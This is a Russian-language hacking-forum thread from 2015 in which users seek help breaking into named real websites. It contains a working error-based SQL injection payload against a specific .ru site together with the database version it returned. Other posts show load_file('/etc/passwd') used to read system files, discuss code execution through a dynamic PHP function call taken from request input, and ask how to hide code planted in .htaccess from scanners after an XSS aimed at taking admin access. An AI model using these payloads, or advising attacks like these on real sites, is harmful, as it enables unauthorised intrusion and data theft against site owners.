 |
|
20.01.2015, 11:32
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Br@!ns
select load_file('/etc/passwd')
даже если так, то можно узнать папки из /home/, однако из /home/user/ или /home/user/***/www/--- нет. другие варианты: брутфорс, раскрытие путей
или как вариант, если тебе нужен список сайтов под определенным юзером ищи конфиг апача
|
|
|
20.01.2015, 11:35
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от mazaxaka
как через sql или phpmyadmin можно узнать список папок , в папке home/user/***/www/----
Если freebsd, то через пма можно узнать.
select load_file('home/user/') покажет все папки в папке user и т.д.
|
|
|
|
23.01.2015, 01:49
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от cipa21
никак не могу раскрутить инъекцию
http://stats.chancemotion.ru/get_content.php
пост num=50
Направьте на путь истинный. Спасибо!
error based в limit
Код:
num=50,25+PROCEDURE+ANALYSE+(0,(SELECT+3+ORDER+BY+extractvalue(1,concat(0x3A,version()))))--+
5.5.32
|
|
|
|
24.01.2015, 22:30
|
|
Новичок
Регистрация: 29.12.2010
Сообщений: 1
С нами:
8089526
Репутация:
2
|
|
есть уязвимый кусок кода:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
могу передать в $function произвольное значение. Попытался передать phpinfo() + exit, но получил ошибку:
Код:
Fatal error: Call to undefined function phpinfo();exit()
Есть какой-нибудь вариант внедрения произвольного кода? |
|
|
|
24.01.2015, 23:16
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от scr1m77
есть уязвимый кусок кода:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
могу передать в $function произвольное значение. Попытался передать phpinfo() + exit, но получил ошибку:
Код:
Fatal error: Call to undefined function phpinfo();exit()
Есть какой-нибудь вариант внедрения произвольного кода? нормально напишите сударь что за функция?
|
|
|
|
24.01.2015, 23:27
|
|
Новичок
Регистрация: 29.12.2010
Сообщений: 1
С нами:
8089526
Репутация:
2
|
|
Сообщение от UXOR
нормально напишите сударь что за функция?
вроде предельно ясно написано, могу передавать произвольное значение. Например:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
|
|
|
|
25.01.2015, 00:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами:
9285506
Репутация:
1463
|
|
Сообщение от scr1m77
вроде предельно ясно написано, могу передавать произвольное значение. Например:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Если не контролируются параметры (хотя бы один), то вряд ли получится RCE.
|
|
|
|
27.01.2015, 15:56
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
http://www.wirtschaftsfrauen.ch/index.php?id=55&no_cache=1&tx_cal_controller%5Bvie w%5D=event&tx_cal_controller%5Btype%5D=tx_cal_phpi calendar&tx_cal_controller%5Buid%5D=357&tx_cal_con troller%5Blastview%5D=view-list%7Cpage_id-55&tx_cal_controller%5Byear%5D=2014&tx_cal_control ler%5Bday%5D=04
Можно чё нить с этим сделать?
Обратил внимание на ' for key 'idx_link_old' SQL=INSERT INTO `wrf_redirect_links`
|
|
|
|
27.01.2015, 19:42
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Есть активная XSS на одном сайте и я хочу получить от него админку, но фишка вся с хостом. Под хостом имеется ввиду мой шелл на котором уже есть свой файл .htaccess в который нам нужно вставить свой код. .. Так вот вопрос, если я дополнительно вставлю свой код, на работе самого сайта это никак не отразится... сканеры могут обнаружить этот код?!
|
|
|
|
27.01.2015, 21:24
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от DezMond™
http://www.wirtschaftsfrauen.ch/index.php?id=55&no_cache=1&tx_cal_controller%5Bvie w%5D=event&tx_cal_controller%5Btype%5D=tx_cal_phpi calendar&tx_cal_controller%5Buid%5D=357&tx_cal_con troller%5Blastview%5D=view-list%7Cpage_id-55&tx_cal_controller%5Byear%5D=2014&tx_cal_control ler%5Bday%5D=04
Можно чё нить с этим сделать?
Обратил внимание на ' for key 'idx_link_old' SQL=INSERT INTO `wrf_redirect_links`
Ресурс, приведенный вами, ведет логи. Ошибка происходит вследствие того, что каждый URL считается уникальным. После повторного захода по этому же URL возникает ошибка Duplicate entry. Это не SQLi.
Сообщение от Unknowhacker
сканеры могут обнаружить этот код?!
Конечно могут.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
